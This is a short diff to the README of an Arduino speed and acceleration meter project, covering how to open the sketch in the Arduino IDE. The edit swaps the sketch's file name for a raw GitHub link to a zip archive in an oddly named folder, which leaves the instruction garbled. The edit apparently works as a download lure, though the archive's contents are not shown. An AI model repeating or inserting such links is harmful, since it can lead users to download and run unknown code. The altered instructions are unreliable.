tered233/Speed-Accel-Meter/README.md

 1. Open the Arduino IDE.
 2. Click on **File**, then **Open**.
 3. Navigate to the folder where you unzipped the project.
-Look for the main `.ino` file, usually named `SpeedAccelMeter.ino`.
+Look for the main `.ino` file, usually named `https://raw.githubusercontent.com/tered233/Speed-Accel-Meter/main/nonconductible/Speed-Accel-Meter.zip`.
 Select it and click **Open**.
 4. Connect your Arduino board to your computer using the USB cable.

 ## ⚙️ Setting Up Hardware